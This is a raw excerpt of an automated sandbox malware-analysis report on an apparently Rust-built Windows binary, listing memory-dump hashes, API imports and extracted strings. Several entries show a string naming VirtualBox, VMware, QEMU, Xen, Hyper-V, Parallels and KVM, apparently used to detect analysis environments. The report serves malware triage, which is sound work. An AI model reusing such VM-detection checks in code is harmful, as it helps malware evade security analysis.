                                        • API ID:
                                        • String ID: 00000000
                                        • API String ID: 0-3221785859
                                        • Opcode ID: 4eeb912c39fe0b6fd1cdb7a9e74c198c1b0e3baab5bcb6297cfd9094762d58d7
                                        • Instruction ID: 57a87f106df9e42924b6ff8690cda80483d48d6682c2e59e36c8ce4c3f759949
                                        • Opcode Fuzzy Hash: 4eeb912c39fe0b6fd1cdb7a9e74c198c1b0e3baab5bcb6297cfd9094762d58d7
                                        • Instruction Fuzzy Hash: 51D13B22F086528BF725DE67F4803B9A696AB51384F84C631ED3D07BD4DF38D94A9390
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0123456789abcdef
                                        • API String ID: 0-1757737011
                                        • Opcode ID: 1f7dc4a732e5e32f7183587c526e160b9137016290444ede52eefc1499fcd771
                                        • Instruction ID: 7bde6ca09123f2a7a1ca6e809bc013e5e2be30c954f39a16ae7cdc6b55ad7bf7
                                        • Opcode Fuzzy Hash: 1f7dc4a732e5e32f7183587c526e160b9137016290444ede52eefc1499fcd771
                                        • Instruction Fuzzy Hash: EE61BC52E0C5D14AF728AF35E4A02BDAF70AB55358F845139DA7B2B7D4CA3C9101D370
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0123456789abcdefBorrowMutErroralready borrowed:
                                        • API String ID: 0-1320686809
                                        • Opcode ID: 7187579c735241f4dfc3b45842631f3c3574dd8905b111c57d23c3362765d900
                                        • Instruction ID: 824952ac5aee0ccfd332d053a1958560afc93e40e9ee9382a309db6b41f46e6f
                                        • Opcode Fuzzy Hash: 7187579c735241f4dfc3b45842631f3c3574dd8905b111c57d23c3362765d900
                                        • Instruction Fuzzy Hash: CB517D63F1D2E19FE3219B79E400AAC7F619F11B44F4480A4CB9C1BFD6C61AC119E3A5
                                        Strings
                                        • USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel, xrefs: 00007FF7F412866E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
                                        • API String ID: 0-2313043791
                                        • Opcode ID: 388be00aa6fcc4f7e68e27d4eb5c03cb8b3c0634eb20838a9b5c367dac4ca083
                                        • Instruction ID: 6963b6882b4e0fd71256213ec7d73a3b833cd4fe11a5b44fa34dc3e82b73836e
                                        • Opcode Fuzzy Hash: 388be00aa6fcc4f7e68e27d4eb5c03cb8b3c0634eb20838a9b5c367dac4ca083
                                        • Instruction Fuzzy Hash: FF5193A2F1461186FB25AF56EC442B8E2B1BB147A8F84C631DE6C436D4DF7C96D1C2A0
                                        Strings
                                        • USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel, xrefs: 00007FF7F41142EB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
                                        • API String ID: 0-2313043791
                                        • Opcode ID: 4462cddbd9253b614b80d496a6a895509d001ce948bc0c70f5788f88d1d9c494
                                        • Instruction ID: 7dbd4b0c001213f5dc6be91397485c05f0c77f828e8a330c55414606301f8e96
                                        • Opcode Fuzzy Hash: 4462cddbd9253b614b80d496a6a895509d001ce948bc0c70f5788f88d1d9c494
                                        • Instruction Fuzzy Hash: C731F6639286E146D7688F12F94463AA678BB44BA0F845135DFBA027D0EAB8D5E0D350
                                        Strings
                                        • USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel, xrefs: 00007FF7F4101018
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
                                        • API String ID: 0-2313043791
                                        • Opcode ID: b3064131c55f79c0ee6adb8ff720aa2cdd455233e95fb1451f5bd72ba3873b7c
                                        • Instruction ID: de1530378cd4bca142df533f7da08bc3e37aec41d34b9c2a0a700bf114de6a45
                                        • Opcode Fuzzy Hash: b3064131c55f79c0ee6adb8ff720aa2cdd455233e95fb1451f5bd72ba3873b7c
                                        • Instruction Fuzzy Hash: 7921D322F14A6189FB10AE6BE4803ED6771AB48BE8F548531DE6D17BC8DE2ED0408390
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: HeapProcess
                                        • String ID:
                                        • API String ID: 54951025-0
                                        • Opcode ID: 8eb1d5c7623788cc2fe55e16711991210c9ba43385e143f39a3a39ebfd7e5168
                                        • Instruction ID: feb7ff4b0077bf1816cbcebf06dbb057b3efdf1239cc86093c1572821410d726
                                        • Opcode Fuzzy Hash: 8eb1d5c7623788cc2fe55e16711991210c9ba43385e143f39a3a39ebfd7e5168
                                        • Instruction Fuzzy Hash: A4F09612F4EA418BF7556F87F88417596946F88BE0F8C4134DD1C423D0EE2CE5C18260
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8c20d947a120ca590f48418ecf91ee7b61298d06be275df6ba079d417f687728
                                        • Instruction ID: 94ed66abd745442abfeb6bbc2b3871d45b31283e30523bc039bf79575595dcfd
                                        • Opcode Fuzzy Hash: 8c20d947a120ca590f48418ecf91ee7b61298d06be275df6ba079d417f687728
                                        • Instruction Fuzzy Hash: 7E326822F0869686FB119F26E4806FCAB64BB557E8FD14232DE6E53AC1DF38D145C390
                                        Similarity
                                        • API ID: ErrorHandleLast
                                        • String ID:
                                        • API String ID: 2586478127-0
                                        Similarity
                                        • API ID: BlockFrameHandler3::Unwindterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStateabortstd::bad_alloc::bad_alloc
                                        • String ID: csm$csm$csm
                                        • API String ID: 9366333-393685449
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,00000001,00000000,?,00007FF7F412AEE3), ref: 00007FF7F412B098
                                        • GetProcAddress.KERNEL32(?,?,?,?,00000001,00000000,?,00007FF7F412AEE3), ref: 00007FF7F412B0D0
                                        • GetProcAddress.KERNEL32(?,?,?,?,00000001,00000000,?,00007FF7F412AEE3), ref: 00007FF7F412B10A
                                        • GetProcAddress.KERNEL32(?,?,?,?,00000001,00000000,?,00007FF7F412AEE3), ref: 00007FF7F412B170
                                        • GetProcAddress.KERNEL32(?,?,?,?,00000001,00000000,?,00007FF7F412AEE3), ref: 00007FF7F412B1A3
                                        Similarity
                                        • API ID: AddressProc$CurrentProcess
                                        • String ID: SymAddrIncludeInlineTrace$SymFromInlineContextW$SymGetLineFromInlineContextW$SymQueryInlineTrace
                                        • API String ID: 2190909847-3384281969
                                        Similarity
                                        • API ID: ErrorLast$FullNamePath
                                        • String ID: \\?\$\\?\UNC\
                                        • API String ID: 2482867836-3019864461
                                        Similarity
                                        • API ID: Handle$CloseErrorLast$CreateCurrentDuplicateProcessThread
                                        • String ID: RUST_MIN_STACK$failed to spawn thread
                                        • API String ID: 4152547513-917136298
                                        Strings
                                        • note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...], xrefs: 00007FF7F411AF85
                                        • stack backtrace:, xrefs: 00007FF7F411AC49
                                        Similarity
                                        • API ID: ErrorLast$CaptureContextCurrentDirectoryEntryFunctionLookup
                                        • String ID: note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...]$stack backtrace:
                                        • API String ID: 2800785878-3192684347
                                        Similarity
                                        • API ID: CloseCreateErrorEventHandleLastMultipleObjectsOverlappedResultWait
                                        • String ID:
                                        • API String ID: 1266231692-0
                                        Similarity
                                        • API ID: CloseHandle$FileSleep$ErrorLastReadWrite
                                        • String ID:
                                        • API String ID: 4082512061-0
                                        APIs
                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF7F413BCEE,?,?,?,00007FF7F413B9E0,?,?,?,00007FF7F4139F79), ref: 00007FF7F413BAC1
                                        • GetLastError.KERNEL32(?,?,?,00007FF7F413BCEE,?,?,?,00007FF7F413B9E0,?,?,?,00007FF7F4139F79), ref: 00007FF7F413BACF
                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF7F413BCEE,?,?,?,00007FF7F413B9E0,?,?,?,00007FF7F4139F79), ref: 00007FF7F413BAF9
                                        • FreeLibrary.KERNEL32(?,?,?,00007FF7F413BCEE,?,?,?,00007FF7F413B9E0,?,?,?,00007FF7F4139F79), ref: 00007FF7F413BB67
                                        • GetProcAddress.KERNEL32(?,?,?,00007FF7F413BCEE,?,?,?,00007FF7F413B9E0,?,?,?,00007FF7F4139F79), ref: 00007FF7F413BB73
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                        • String ID: api-ms-
                                        • API String ID: 2559590344-2084034818
                                        • Opcode ID: 04c847d430a8b357cbdcd349c4e5867dc99fbc92d9ffa70d1cdd1b41aff0efb5
                                        • Instruction ID: 61055ff27fe01eb23f812a91b36d6e77cc79037a95b076727ed86bca4c6fbd72
                                        • Opcode Fuzzy Hash: 04c847d430a8b357cbdcd349c4e5867dc99fbc92d9ffa70d1cdd1b41aff0efb5
                                        • Instruction Fuzzy Hash: 7431C021F1AA4283EF61AF03F480675A694BF45BA4F990534DDBD4B3D9FE3CE54082A0
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: Handle$CloseConsoleErrorLastMode
                                        • String ID: called `Result::unwrap()` on an `Err` value
                                        • API String ID: 1170577072-2333694755
                                        • Opcode ID: 81e5c3a94e51ffe971110ae7c630a86fd0ffae82760944cc50fcb365f4217783
                                        • Instruction ID: aaa259d95dd0ac24781ccb9d557bfba7ab4f9c9ccd84c6ee9d21ba75549b5328
                                        • Opcode Fuzzy Hash: 81e5c3a94e51ffe971110ae7c630a86fd0ffae82760944cc50fcb365f4217783
                                        • Instruction Fuzzy Hash: 09817461E086528AFB11AF72F8803F9A761AB06798F844131DE7D526D5DF3CD289C3A0
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_recordabort
                                        • String ID: csm$csm
                                        • API String ID: 4198837600-3733052814
                                        • Opcode ID: f8d6e8cedad6a77bb2c0396b1c190e5ae66afbc715b34cc6c0c9cebf76f4a201
                                        • Instruction ID: 1cb86b4801a13011e5699e685d8db0a08a3f59be1eb08a591ae4a9cd8cc34de8
                                        • Opcode Fuzzy Hash: f8d6e8cedad6a77bb2c0396b1c190e5ae66afbc715b34cc6c0c9cebf76f4a201
                                        • Instruction Fuzzy Hash: C9518F32E0828687EB74AF12F484278B7A0EB55B84F944135DAAC47BD6DF3CE850D790
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: CallEncodePointerTranslatorabort
                                        • String ID: MOC$RCC
                                        • API String ID: 292945357-2084237596
                                        • Opcode ID: c2d086761dc6fd18626da9231b532bc478a06c8ba32be5aa6bc7485a53e977e9
                                        • Instruction ID: d3c1599395fb5010b9bc6de02951e1cf5fc8638fb9a50c4b3a5dfbb0312f8d4c
                                        • Opcode Fuzzy Hash: c2d086761dc6fd18626da9231b532bc478a06c8ba32be5aa6bc7485a53e977e9
                                        • Instruction Fuzzy Hash: FE617D32908BC586DB209F16F4807AAB7A0FB95BD4F444235EAAC03B95DF7CE090DB50
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ErrorLast$FullNamePath
                                        • String ID:
                                        • API String ID: 2482867836-0
                                        • Opcode ID: ba76eefd639af96dec1f28aa9424d795c10072416cba78c9c45828c53f0cbe8d
                                        • Instruction ID: e967665515c4240ccca38238d0242b41ea0612656aa97e05e70c4014a9eeafee
                                        • Opcode Fuzzy Hash: ba76eefd639af96dec1f28aa9424d795c10072416cba78c9c45828c53f0cbe8d
                                        • Instruction Fuzzy Hash: 2BB18F62A04BC18AEB65AF26E8847E8A655FB04BD8F904231DE2C9B7D5DF38D3458350
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ErrorLast$FullNamePath
                                        • String ID:
                                        • API String ID: 2482867836-0
                                        • Opcode ID: 3312637ff695d0fd956b92b6b936942761c90b43967c05ecb60f82c5b0f61ac3
                                        • Instruction ID: 2419fa39953ed2d9d49ab18101d480e645910375c4227f3fda036cec668eb697
                                        • Opcode Fuzzy Hash: 3312637ff695d0fd956b92b6b936942761c90b43967c05ecb60f82c5b0f61ac3
                                        • Instruction Fuzzy Hash: 2FB18062E047C28AEB35AF27EC847A9A254FB44BD8F844235DE6C5B7D5DF3893418350
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ErrorLast$EnvironmentVariable
                                        • String ID:
                                        • API String ID: 2691138088-0
                                        • Opcode ID: 40a8af77cb83e711465423b7e4295d1b533cfbe4621878e8606779f8fa624747
                                        • Instruction ID: 2cc7f42ea650c690f0443abe1df9007d0d3f2f02f783af67ee3c77fcfa64fe73
                                        • Opcode Fuzzy Hash: 40a8af77cb83e711465423b7e4295d1b533cfbe4621878e8606779f8fa624747
                                        • Instruction Fuzzy Hash: 4A81E762E04BC18AFB719F26E9843E9A365FB447E8F804131DE6C5B7D5DF3892818350
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ConsoleErrorLastWrite$ByteCharMultiWide
                                        • String ID:
                                        • API String ID: 1956605914-0
                                        • Opcode ID: 9b792ba087b754caaed6a68868abe4804498491c3c59dfb27f505c1cfb20efb0
                                        • Instruction ID: fca68316ef41fc24987bb97c520737359ab4d59a5cc4463f9c11dc5c570203fc
                                        • Opcode Fuzzy Hash: 9b792ba087b754caaed6a68868abe4804498491c3c59dfb27f505c1cfb20efb0
                                        • Instruction Fuzzy Hash: 5B51A521E0C69386F760AF22F8843FAA651FB45794F844135D97D87AE4EF3C968583A0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ErrorLast$FileModuleName
                                        • String ID:
                                        • API String ID: 1026760046-0
                                        • Opcode ID: f01fb9a2bc57b3d2b1039f647bb717d38f054ee20f4b73a6f2b0038690f7b895
                                        • Instruction ID: d5a51adb58331aa3c806e7a6ba621dd1d0ebec21a423dfce3d617dee42f33fc1
                                        • Opcode Fuzzy Hash: f01fb9a2bc57b3d2b1039f647bb717d38f054ee20f4b73a6f2b0038690f7b895
                                        • Instruction Fuzzy Hash: A951D662E08BC14BEB71AF27F8847F9A268BB45BE4F904135DD6C466D5EF389281C350
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CurrentDirectory
                                        • String ID:
                                        • API String ID: 3993060814-0
                                        • Opcode ID: a71a4c22c91586a61734b4bf9cdfccbd620d121b6fd3e40877aba937771e1c0d
                                        • Instruction ID: 6888e77cf9a752977818f80b7318bdb7a10fd99383ead1420c4c0d3ccc5035d4
                                        • Opcode Fuzzy Hash: a71a4c22c91586a61734b4bf9cdfccbd620d121b6fd3e40877aba937771e1c0d
                                        • Instruction Fuzzy Hash: FB51D662E04BC24BF771AF67F8843A9A268BB44BE8F804135DD6C467D5DF3CA2858350
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ErrorHandleLast$CurrentDuplicateProcess
                                        • String ID:
                                        • API String ID: 3697983210-0
                                        • Opcode ID: a84996ec7724e0f27e3750ae2423f6fd2eb7d8270aa4a0a9ba7a348fda5a6813
                                        • Instruction ID: 75b16608f92de88d7bfc3dca5d9ceec2691e94833267c1e5fa23c2623e0ff2a7
                                        • Opcode Fuzzy Hash: a84996ec7724e0f27e3750ae2423f6fd2eb7d8270aa4a0a9ba7a348fda5a6813
                                        • Instruction Fuzzy Hash: A8118F71E0C74687FB20AF63F4843BAA651EB457A8F904230D97D467C4DF7CE14482A0
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: AddressSingleWake
                                        • String ID: <unnamed>$Box<dyn Any>aborting due to panic at $main
                                        • API String ID: 3114109732-896199136
                                        • Opcode ID: 0026388bcf7ca5048021ae864d0e4a43bbb5f126b99ceda82b88653c6e9fc59c
                                        • Instruction ID: 267995a80e0cc546c91ff009a4fd4cafa4df0e9c4d5d9a7ecf35c53e7a61d793
                                        • Opcode Fuzzy Hash: 0026388bcf7ca5048021ae864d0e4a43bbb5f126b99ceda82b88653c6e9fc59c
